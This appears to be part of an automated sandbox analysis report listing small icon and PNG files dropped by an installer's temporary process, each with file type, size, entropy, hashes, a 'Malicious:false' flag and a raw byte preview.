                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.78558880583897
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:KfbXxEm8sLBtLt08SHKdvaB8a+jzSCt/lgj5XTc64b6fNSuHwPqD7H:KfbhX8sL90rHKNaB8ayRYdjc64OpVb
                                                                                                                                                                                                                                                          MD5:BD477227A18FED51A2C527EA4E32400B
                                                                                                                                                                                                                                                          SHA1:6FC1F173245E77BDA386CE112D9A19502E5C0A92
                                                                                                                                                                                                                                                          SHA-256:6569A42B81E6B02E8385CDF5EED48A3FBF3CB89101142723FAAEECDC9785D203
                                                                                                                                                                                                                                                          SHA-512:20DC45444E3D2FF3C5C427C60A5B1C7941FFE74E79B9C156E033D53DCBB616AA2A0518AFC2CCFD7FAC4D95581AC2606DF81B7BACA7EA28AD875871949DD8229B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ......................................................................................................fA..hB..kD..mE..oG..sI..tK..rI..lE..iC......................b?..................................fA.............._<.....d?..fA..hB..jC..e<.............d..d=.....b?..........]<.....c?..d@..fA..hB..b;.............c..b<.....a>..........[;.....a=..b>..d@..e@..`9.............a.._:.....`=..........Z:....._<..`=..b>..c?..Y4.............{\..Y5.....]<..........X9.....\;..]<.._<..a=..nN.............v..pQ.....[:..........V7.....X8..Y8..Y8..[:.............................W7..........S5.....eE..mL..sQ..wU.............................T5..........{[.....f..g..g..g..}Y................wS.....|\..........j.....i..i..i..j..e........................i..........o.....o..o..o..o..o..k.....................n..............u.........................v......................{..{..{..{..{..{..{..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):485
                                                                                                                                                                                                                                                          Entropy (8bit):7.183161975210355
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7wM6ZjkLD81AWeAqr9XoQh35hBMjExRnj8OiD1i77sOw3N:XMfLDMe/4QFTyExl8Oihi8OIN
                                                                                                                                                                                                                                                          MD5:E09587AD1847CF4E2AD03524A3C1CA7D
                                                                                                                                                                                                                                                          SHA1:9564E6F66C74E3079F2DDA05A6A61742FB23683D
                                                                                                                                                                                                                                                          SHA-256:603A9A84F0E095585BD39B27CD4C4D194A4A45C664373D636E493C2841084957
                                                                                                                                                                                                                                                          SHA-512:5A00DB9331B1F1536C6152BF99F7245D159E46101122FA6827B0D5EF8D0377DB66DBB4CEAECA69F1AEC8FDDE51B506CB471B58A34E8A3DF09BAE0FC3F117CA2A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4.......tEXtCreation Time.12/12/08.Z.....=IDAT8....J.P....DJ.V.hK!b...E.;8..../. 8._.'p..!...I.v.EQi. ...CZ..%..-.s...~.....cr....!."TjR...RY04M....!...s..i....'.r.j...../.>......(.g.....=...2....>~...89.Eq.....?.\.Z......C...cE...|.I.X.....(I...W.a..zj...O.:.?.........,.....PK...c...Y..5...B..k........jlmn@..S...qe]...z..p.1..\.E..|...d{{.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.463689107615048
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:K/1fhCeNZn1dIxF327RYl2gZArfrReA/T3UqZzqi:K/9hCAZn3EGRYvZMrReA7UMzqi
                                                                                                                                                                                                                                                          MD5:C4CE03C4D6D52FDA15ED85DD35661191
                                                                                                                                                                                                                                                          SHA1:7FC5453E63A2B3C8F5CC17A1A5B9D40E3BBCAA89
                                                                                                                                                                                                                                                          SHA-256:EA932489B1C366D47D33EF6FC4898A11E85C5EF5BA2982A21506FF49BD230B44
                                                                                                                                                                                                                                                          SHA-512:2A332EE917FDCEE81C4F1E19F340498B37AA1B549A1E48E5C5207879F5A6EC1233052A606202CE254E629EE63676BDAA1438D4165D0BF48C3CB4BCC3A26BC907
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ................................................................................................................H.H.#.#............................................b...4...+...X...y...'.'.!.!................................T...H...9...*.......~...r.r.'.'................................]...T...E...6...'..............&.&................................^...U...C...h..........5.5.-.-.%.%..................."..;..{....................I.I.<.<.4.4.,.,.#.#...............+..>..8.....w.........Z.Z.M.M.C.C.;.;.2.2.*.*..............3..N..J..j............k.k.\.\.M.M.B.B.9.9.1.1.#.#..........I..w..........}..u.....w...n.n.`.`.Q.Q.F.F.9.9...<.........._.............o..[........L^..Ci..4b..&Q...,...............f.............~..k........jj..QQ..<<..++...................k................w.........ii..ZZ..EE..33..&&...............Z.........................rr..``..LL..;;...................r...X..`...............yy.II
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):781
                                                                                                                                                                                                                                                          Entropy (8bit):7.651387048168162
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:tfp9eW5Oon3iu7MTGS7ZN6tv1lyvv60hrTcdrU:j9eW5VSOwn4lwi0tGU
                                                                                                                                                                                                                                                          MD5:4121D02B972D718C30E8B41023B894EE
                                                                                                                                                                                                                                                          SHA1:751D347690F151AEAC02DD8C69A1F3D629D1DDD0
                                                                                                                                                                                                                                                          SHA-256:807241CF72D7A2CC7DA63ADE8E22F6D1976E9B5D4B9CEC8479960EF4CE0CAD24
                                                                                                                                                                                                                                                          SHA-512:FCDF69080406D542FA6A460C741BD53B4BC052D26EF930F61381CD05B73DCC1D8F13AE71A786E0C795BBE6889ED044D2CF9427CCC3E29CBF3BB7C97188E31BF0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..MH.a.....[..'...m&......h...C...!.....T...%.(l........6...!Z7E.v%.e.u.gfwvg..P../<..........$.8.". ..W..#]..D.L...q..2"N.!.."ar.9V+.....>..++......Y{..Hk.5.av-./.C..x._..1....,...n7.... ......U..>-Ru....t=.-o...p...W...9z.......\...>....V...,P-..Icr"F,..s1l3<....PU.......J......h@../..R.Y}2........f..R`.....=.a.s.F..y.8e.......[.?..<.....JK.."..p...Y...!..H....L.A0.D.....sU.*.NQGS..(.xF....._y..S.p2N..w....p,.......=.T.^G....p.$.=w.b..4.~. ...FY5q...!z..N....*7EG.r.Og.(.o..8...*.\..6."J......huh../sT..2%2$?.Y.".....b.y.x?.....=@..w..m.p..T..#..+@M.{...=j|..-E.x.>@.....h...2.H.?.O......t..a.6.......k..n.5.L..3...8~^..%......G.....*!......)..fCMMMWjjj.2aL...c.y....&G.......VA.:..I..........!......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):6.999082250525666
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPLzGx5AzGCL2yyI+9G1TWruJHixcusmPuAU/iCSS1zbuaVVp:6v/7DyeL2/Gor8HixWmkSEt7
                                                                                                                                                                                                                                                          MD5:08D991D399E657EA3A81DA798D204DD8
                                                                                                                                                                                                                                                          SHA1:8B8161A39DA344A96DCC40F8722D7C2BDAEE05D3
                                                                                                                                                                                                                                                          SHA-256:0DC9ECD2BB9B3A9E95D45B431B050CB3B32D7D1913CAEE21223193F6D6DFA4C2
                                                                                                                                                                                                                                                          SHA-512:C2CDCA46638E013B0196DA608FEC94846E006817852556BAD6702CC7A2798E93C3E6BC3678450C55C9C89590AF2BDE12C3032D449CCE7A3B5FF637987936000B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDAT8..R...p...U.....\..rvt.6-".c...am.....!q.j.sPJ.0..;....#..P......7T.....#.1l..G.wc.T}YB%F8.R........Yv.zu?..........].....ag.v..d.v.X..].0..l'....e..f..5.."}.....Za.. ,S|.......,t...p.d.{...]..u..U.D._....!9...q...W9].......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.836023872190528
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:DNZdMMMMYVyz2pwij2kQauIG+wEvP3EkBChMc0kkkkke8x2R+Mxz6wwwwwwwwwwg:3qVyb0up+wEXvku8x2R+MlZwwwwwwwwh
                                                                                                                                                                                                                                                          MD5:881D10F5781985AD7299364314CEB948
                                                                                                                                                                                                                                                          SHA1:4F7B1A21207997EE749EABB0310E6AF507F7A502
                                                                                                                                                                                                                                                          SHA-256:F7DD472A36C95EDC749DCAF7CCD44ADD8D3A9DE083101BDE1DD6994051374082
                                                                                                                                                                                                                                                          SHA-512:476D739E9315B2087B0AE8DA53C8DFEB3747DE7C9548C25648B6254B7A91DCEAC10096DDC04175997D268A32612197BE07C685A4BB33643ED544FBCAC947DF88
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................q...q...q...q...q...q...q...q...q...q...q...q...q...q...q...q...n...n...n...z...................................z...n...n...n...j...j...................................................j...j...g...t.......x...g...g...g...g...g...g...g...g...x.......s...g...c...........c...c...c...h...........g...c...c...c...........c..._|.........._|.._|.........................._|.._|.........._|..\m..........\m..ar......z...\m..\m..{.......`r..\m..........\m..Y_..........Y_..........Y_..Y_..Y_..Y_..........Y_..........Y_..cV..........cV..........cV..cV..cV..cV..........cV..........cV..mN..........mN..rS.......n..mN..mN...o......rS..mN..........mN..xE..........xE..xE...m...................m..xE..xE..........xE...=..........=...=...=...C...n...n...C...=.......N..........=...4...F.......J...4...4...4...4...4...4...4...8...K.......E...4...,...,...l...................................k...,...,...............A.....................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1143
                                                                                                                                                                                                                                                          Entropy (8bit):5.316029185743153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7u/BKpQr+mJEhtGXJoZ3ZbMzcLLUaMdEAfk8zKGPsl1:5Kpf3GXJoXMwL/MdEAfk87Ez
                                                                                                                                                                                                                                                          MD5:6C2EE6F053AB95D2AA3924EE689E80B9
                                                                                                                                                                                                                                                          SHA1:734FE9B1CAE77E70BE14D79B2A14B545AA249499
                                                                                                                                                                                                                                                          SHA-256:FC44A14405F3747A5D87DD09CCABB3C0E312B5E127929C6E2CF5920F125F132A
                                                                                                                                                                                                                                                          SHA-512:5BA51D89FD4BF61BE55AFC3210FB31ED7DAEA5C44D9829BF0CC48685EF283ADD50F53039748312CD57194085067D88BCD0B9FA0A58C462DA595E2BB54534FFF5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............(-.S....sRGB.........gAMA......a.....PLTE.Nm.Ex.Sr._Y.Vc.m\.|_.r`.ra.5..,..4..=..8.....C..N..E..F..J..K..A..k..n..o..m..m..n..l.....c.g.h.z.{.g..j.s.t.x..n..z..q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................./V.4....pHYs...........~.....tEXtSoftware.paint.net 4.1.6.N......IDAT(S]..;.Q....t..9&K.......R(.U(!DD....<.....y....eE......X.p.+4...f.k....n....E)e(.....%..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.276060631735337
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MXjJ+Ja5yURg0WulL9rChz1XcXbQxX2rD4:kIJ4yURgLkprChzBcXbeXID4
                                                                                                                                                                                                                                                          MD5:97B03F45DC3F2AA6B9908A842ED7A308
                                                                                                                                                                                                                                                          SHA1:5C0489A30B7805DB94B9F60C53616A4CA8BCA5C4
                                                                                                                                                                                                                                                          SHA-256:C08548C6A31E3C58F69B083ADAA3154C5957619E65F1FF910FDBB7F83B480183
                                                                                                                                                                                                                                                          SHA-512:78130C2A02CF5E56103C42E3ADB35CA85DBB8A66259C895F7CEB987B1BC7B73932F54A2F28B4F065765C9B9264E088E57C5DEE70ABCC9B41D9DE6AEE90BE08A9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................U="..b<.f>.f>.f>.f>.f>.f>.f>.f>.f>.f>.b<.U=".....W>"..wJ..tH..tH..tH..tH..tH..tH..tH..tH..tH..tH..tH..tH..wJ.W>"..g;.pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..g;.i<.mA..mA..l@..l?..l@..mA..mA..m@..l?..l@..mA..l@..l?..l?..i<.g9.j>..j=..|].......l..i<..j>..sQ.......]..i<..._.......y..f7.e7.g:..d4..............a2..g:..x^.......t..g<..........rJ..e6.c4.c6..a8..............tM..c6..x].......o...........y..a3..c4.a2._1...n......|c..........^0..x[.................[,..`2..a2._/.X'.........]/.........`2..~c...............w..Y*..]..._/.[+.f?.........tL...........j...u..................._..c7..[+.yR.............a...g.......................a...........d..yR.i........u...r...o..........~..........r..............j.z.........................................................z...............................................................p[..............................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.943382230545427
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:S4YaNZKzJLGaBGzrHyCX0n3Ols63OjokVhVZcR9dfw8skIL00006fDxzKapll1Km:1uzJJBGH+j5hS9VxAmpKuNNNNNNNNNZ
                                                                                                                                                                                                                                                          MD5:C372CECACDD31BCFD147D55D146C2CD4
                                                                                                                                                                                                                                                          SHA1:A0C7F66256023E4DA4697CE0D37D809D206CC85E
                                                                                                                                                                                                                                                          SHA-256:508BD905BEA0E89DA025DECD1BFE5E4B31A1F003BC3F2B5C5567A2470A307820
                                                                                                                                                                                                                                                          SHA-512:58287A1C0896ABA3F9712FCEA29C3DAF892AE9F485E4DDBA56A442F9B7B6F439D3375A0EB46209FF4E86720B0D5C706BC22F8C49165A34458CA0A4EE2BD94DE7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ...........................Q...F...?...?...?...?...?...?...?...?...?...?...?...>...E...Q...H...i...............................................d...H...C...................E...3...3...3...3................C...E................3...3...3...3...3...3...3.............E...G.............F...3...3...3...3...3...3................H...I.............3...3...3................................J...K.............3...3...3................................L...N.............3...3...3...3...3...3...3................N...P.............3...3...3...3...3...3...3...3.............P...R..............3...3...3...3...3...3...3.................R...T..............3...3...3.................................U...V..............3...3...3.............................W...X.................3................................Y...[.....................................................\...g......................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.0034072391179
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:3l4333333Ba333U7JDYF7336Ooi/F73afj/F72vcvtRaIDJluX5Ojk:VgWF+OZ/Fmj/Fgc6+uJOjk
                                                                                                                                                                                                                                                          MD5:67B4BC8703A96A1CAB1B0AC8E37B26F8
                                                                                                                                                                                                                                                          SHA1:363D0703311B99984E26F216A5205CD8D03E8389
                                                                                                                                                                                                                                                          SHA-256:AE2369C58A93218087EB6B5535B1D2547F1FAE00DBC7303ACE8B3B1238BC7CB2
                                                                                                                                                                                                                                                          SHA-512:0283160D49F3F7C17496B5476B2BF7689B3203E0E97CD36CA6EBE06A24D46A62F469C4F24E310220AA48D4FF7AD6D51A56621ED443AFAA50B7645B6688EBB33A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................?_..MZ.L...I...P...P...P...P...P...P...P...P...P...P...H.8.H*?..LZ.MZ................................................./9../9..KX.MZ................................................/9...9..KX.MZ................................................/9...9..KX.MZ................................................/9...9..KX.MZ......................p|..co..................../9...9..KX.MZ..................P`..MZ..MZ..P[................./9...9..KX.MZ..............MZ..Q^..........O[..MZ..lw......./9...9..KX.MZ......Vc..MZ..co..................en..MZ..S]..../9...9..KX.MZ..MZ..MZ................................MZ..MZ..>K../9..MZ.MZ..O_..........................................R`..MZ..LW.KY.JYc.................................................Zg..LY.S..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.007783593279535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:w66666666666BOOOOOOOOOOSXOOOOOOOOOOSXOOO2OOOSXOeKLOSRMlSkHdOOOO9:w66666666666P3O66666666666/Ojk
                                                                                                                                                                                                                                                          MD5:887346B0A7F145675E44AB17E35F54FE
                                                                                                                                                                                                                                                          SHA1:C22531915DF0528177698EA3AD39DB9A70EA6869
                                                                                                                                                                                                                                                          SHA-256:BAC266365103ED4DDCA35A3B2398886E2090BBE53899DC809FA7DC9599654BC9
                                                                                                                                                                                                                                                          SHA-512:7EEC4DAE36617AE74FA8A916ED16746FD97BBC742C05BBA3250904660D1C8E87989D39BCEEAE405016A95F22BE937EBDB789A22E42CD1088F0ABF623916679B8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .........................................................................................................................................................U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6V..........................................................Z..V..........................................................Z..V..........................................................Z..V..........................................................Z..V......................p...q...q...p.......................Z..V..............t...s...................u...s...............Z..V......z...p...................................q...w.......Z..T..j...................................................k...W..V..........................................................Z..V..........................................................Z..U..6V..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tV..tU..6..........................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):776
                                                                                                                                                                                                                                                          Entropy (8bit):7.739847313028713
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7A0VGIMaJnGINOCUG1s1tdXBlkgV3qICi6aw5FDk+RA1xuw/bK11x8GRtnY1V:5IzGGO60BC/P5iohugnYiLjU
                                                                                                                                                                                                                                                          MD5:F7412F52AFCDBFAA2520A462C99468FC
                                                                                                                                                                                                                                                          SHA1:DE1BAD996FACA409432C84C0EE0724827C00D072
                                                                                                                                                                                                                                                          SHA-256:13F249E23B22582CFC057954C4A040EBA5733E3FEEA3FC3DAB0F9EF584DE89A8
                                                                                                                                                                                                                                                          SHA-512:FA1205996FF98BCA175F38AB210AF47E56DF29E580D8FA16CA6C30C9BF324D53847335149DCDB874178F7642D49AD24DFEC0C67B32F831E6999B9050FB7ECE64
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
